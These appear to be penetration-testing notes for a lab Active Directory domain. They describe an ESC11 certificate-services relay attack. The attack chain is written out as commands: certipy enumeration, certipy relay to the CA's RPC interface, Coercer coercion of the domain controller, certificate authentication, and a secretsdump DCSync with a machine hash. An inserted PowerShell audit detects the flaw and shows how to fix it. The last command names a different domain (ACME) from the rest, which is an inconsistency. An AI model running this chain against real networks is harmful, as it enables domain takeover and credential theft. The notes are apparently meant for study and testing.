
ESC11

Resource: Toby - Exploiting Active Directory Certificate Services - ESC11 Walkthrough

No PKINIT? RBCD. Resource: TrustedSec - Practical Attacks against NTLMv1

Check:

$ certipy find -u fcastle@marvel.local -p 'Password1' -dc-ip 192.168.218.136 -stdout
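The same condition checked from the defender's side, as an added example that is not part of the original notes: ESC11 corresponds to the CA's IF_ENFORCEENCRYPTICERTREQUEST interface flag (0x200) being cleared, which is what certipy's "Enforce Encryption for Requests" finding reflects. This PowerShell runs locally on the CA host as an administrator, reads the CA name from the CertSvc Active value, tests the bit, and shows the certutil remediation (commented out).

```powershell
# Added defender-side audit for ESC11 (not from the original notes).
# Assumptions: run on the CA host as an administrator; the CA name is
# taken from the Configuration\Active value, so nothing is hard-coded.
$base   = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
$caName = (Get-ItemProperty -Path $base -Name Active).Active
$caKey  = Join-Path $base $caName

# IF_ENFORCEENCRYPTICERTREQUEST = 0x200. When set, the CA rejects
# MS-ICPR RPC requests that do not use packet privacy, which removes
# the unencrypted RPC interface that an ESC11 relay depends on.
$IF_ENFORCEENCRYPTICERTREQUEST = 0x200
$flags = (Get-ItemProperty -Path $caKey -Name InterfaceFlags).InterfaceFlags
$hex   = '0x{0:X}' -f $flags

if (($flags -band $IF_ENFORCEENCRYPTICERTREQUEST) -eq 0) {
    Write-Output "[!] $caName InterfaceFlags=$hex : encryption NOT enforced (ESC11 exposure)"
    # Remediation (uncomment to apply; the CA service must be restarted):
    # certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST
    # Restart-Service certsvc
} else {
    Write-Output "[+] $caName InterfaceFlags=$hex : encryption enforced"
}
```

After applying the flag, re-run the certipy find command above; the CA section should no longer list ESC11.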

If vulnerable to ESC11:

Use certipy to relay:

certipy relay -target 'rpc://HYDRA-DC.marvel.local' -ca 'MARVELCA' -dc-ip 192.168.218.136

Note: when the relayed target is a domain controller, -template DomainController must be specified. Likely full command:

certipy relay -target 'rpc://HYDRA-DC.marvel.local' -ca 'MARVELCA' -template DomainController -debug

If the target is not the DC, see ESC1.

Coerce the DC with Coercer:

Coercer coerce -t dc.ip.goes.here -u userHere -p 'Password123!' -d marvel.local -l certipy.server.ip.here

Once the .pfx is retrieved:

certipy auth -pfx dc.pfx -dc-ip dc.ip.goes.here -domain marvel.local

Use the obtained machine account NTLM hash to DCSync the DC with secretsdump:

secretsdump.py -hashes :e52cac67419a9a224a3b108f3fa6cb6d -just-dc-ntlm 'ACME/dc01$@dc01.domain.com'